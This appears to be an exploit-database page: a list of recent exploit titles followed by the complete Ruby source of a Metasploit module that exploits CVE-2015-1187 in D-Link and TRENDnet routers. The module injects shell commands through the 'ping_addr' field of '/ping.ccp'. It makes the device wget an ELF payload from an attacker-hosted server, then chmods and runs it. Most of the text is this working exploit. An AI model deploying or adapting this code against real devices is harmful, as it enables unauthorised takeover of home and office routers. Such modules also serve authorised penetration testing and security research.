
39 new exploits Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit) Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit) Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit) Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit) Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit) Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit) EMC Replication Manager < 5.3 - Command Execution (Metasploit) MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit) Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit) CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit) Lenovo System Update - Privilege Escalation (Metasploit) Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit) HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit) VMware Host Guest Client Redirector - DLL Side Loading (Metasploit) CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit) MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit) SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit) Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit) ExaGrid - Known SSH Key and Default Password (Metasploit) GIT 1.8.5.6 / 1.9.5 / 2.0.5 / 2.1.4/ 2.2.1 & Mercurial < 3.2.3 - Multiple Vulnerabilities (Metasploit) Ruby on Rails 4.0.x / 4.1.x / 4.2.x (Web Console v2) - Whitelist Bypass Code Execution (Metasploit) Apache Struts < 1.3.10 / < 2.3.16.2 - ClassLoader Manipulation Remote Code Execution (Metasploit) Samba 2.2.2 < 2.2.6 - 'nttrans' Buffer Overflow (Metasploit) SSH - User Code Execution (Metasploit) Redmine SCM Repository - Arbitrary Command Execution (Metasploit) Linux/x86 - Bind Shell Shellcode (42 bytes) Linux/x86 - Bind Shell Shellcode (44 bytes) Joomla! Component Modern Booking 1.0 - 'coupon' Parameter SQL Injection Flippa Clone - SQL Injection Centreon < 2.5.1 / Centreon Enterprise Server < 2.2 - SQL Injection / Command Injection (Metasploit) D-Link/TRENDnet - NCC Service Command Injection (Metasploit) Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit) MantisBT 1.2.0a3 < 1.2.17 - XmlImportExport Plugin PHP Code Injection (Metasploit) OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'license.php' Remote Command Execution (Metasploit) OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - 'welcome' Remote Command Execution (Metasploit) PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit) SysAid Help Desk Administrator Portal < 14.4 - Arbitrary File Upload (Metasploit) WordPress Plugin Ninja Forms 2.9.36 < 2.9.42 - Unauthenticated File Upload (Metasploit) SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit) WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit) Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)
190 lines
No EOL
6.1 KiB
Ruby
Executable file
190 lines
No EOL
6.1 KiB
Ruby
Executable file
##
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
|
Rank = NormalRanking # Only tested on Emulated environment
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::Remote::HttpServer::HTML
|
|
include Msf::Exploit::EXE
|
|
include Msf::Exploit::FileDropper
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
|
|
'Description' => %q{
|
|
This module exploits a remote command injection vulnerability on several routers. The
|
|
vulnerability exists in the ncc service, while handling ping commands. This module has
|
|
been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
|
|
are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
|
|
(Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
|
|
DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
|
|
v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
|
|
DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
|
|
v2.01b01
|
|
},
|
|
'Author' =>
|
|
[
|
|
'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
|
|
'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
|
|
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['CVE', '2015-1187'],
|
|
['BID', '72816'],
|
|
['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
|
|
['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
|
|
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
|
|
],
|
|
'Targets' =>
|
|
# Only tested on D-Link DIR-626L where wget is available
|
|
[
|
|
[ 'Linux mipsel Payload',
|
|
{
|
|
'Arch' => ARCH_MIPSLE,
|
|
'Platform' => 'linux'
|
|
}
|
|
],
|
|
[ 'Linux mipsbe Payload',
|
|
{
|
|
'Arch' => ARCH_MIPSBE,
|
|
'Platform' => 'linux'
|
|
}
|
|
],
|
|
],
|
|
'DisclosureDate' => 'Feb 26 2015',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
|
|
OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
|
|
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
|
|
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
begin
|
|
res = send_request_cgi({
|
|
'method' => 'GET',
|
|
'uri' => normalize_uri(target_uri.path)
|
|
})
|
|
|
|
# unknown if other devices also using mini_httpd
|
|
if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
|
|
return Exploit::CheckCode::Detected
|
|
end
|
|
rescue ::Rex::ConnectionError
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
def exec_command(cmd, timeout = 20)
|
|
begin
|
|
res = send_request_cgi({
|
|
'method' => 'POST',
|
|
'uri' => normalize_uri(target_uri.path),
|
|
'encode_params' => false,
|
|
'vars_post' => {
|
|
'ccp_act' => 'ping_v6',
|
|
'ping_addr' => '$(' + cmd + ')'
|
|
}
|
|
}, timeout)
|
|
return res
|
|
rescue ::Rex::ConnectionError
|
|
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
|
end
|
|
end
|
|
|
|
def primer
|
|
@payload_url = get_uri
|
|
wget_payload
|
|
end
|
|
|
|
def exploit
|
|
print_status("Accessing the vulnerable URL...")
|
|
|
|
unless check == Exploit::CheckCode::Detected
|
|
fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
|
|
end
|
|
|
|
print_status("Exploiting...")
|
|
|
|
@pl = generate_payload_exe
|
|
@payload_url = ''
|
|
@dropped_elf = rand_text_alpha(rand(5) + 3)
|
|
|
|
if datastore['EXTURL'].blank?
|
|
begin
|
|
Timeout.timeout(datastore['HTTPDELAY']) { super }
|
|
rescue Timeout::Error
|
|
end
|
|
chmod_payload
|
|
exec_payload
|
|
else
|
|
@payload_url = datastore['EXTURL']
|
|
wget_payload
|
|
chmod_payload
|
|
exec_payload
|
|
end
|
|
end
|
|
|
|
def wget_payload
|
|
upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
|
|
|
|
cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
|
|
|
|
print_status("Downloading the payload to the target machine...")
|
|
res = exec_command(cmd)
|
|
|
|
if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
|
|
register_files_for_cleanup(upload_path)
|
|
else
|
|
fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
|
|
end
|
|
end
|
|
|
|
def chmod_payload
|
|
cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
|
|
|
|
print_status("chmod the payload...")
|
|
res = exec_command(cmd, 1)
|
|
|
|
unless res
|
|
fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
|
|
end
|
|
|
|
Rex.sleep(1)
|
|
end
|
|
|
|
def exec_payload
|
|
cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
|
|
|
|
print_status("Executing the payload...")
|
|
res = exec_command(cmd, 1)
|
|
|
|
unless res
|
|
fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
|
|
end
|
|
|
|
Rex.sleep(1)
|
|
end
|
|
|
|
# Handle incoming requests to the HTTP server
|
|
def on_request_uri(cli, request)
|
|
print_status("Request: #{request.uri}")
|
|
if request.uri =~ /#{Regexp.escape(get_resource)}/
|
|
print_status('Sending payload...')
|
|
send_response(cli, @pl)
|
|
end
|
|
end
|
|
end |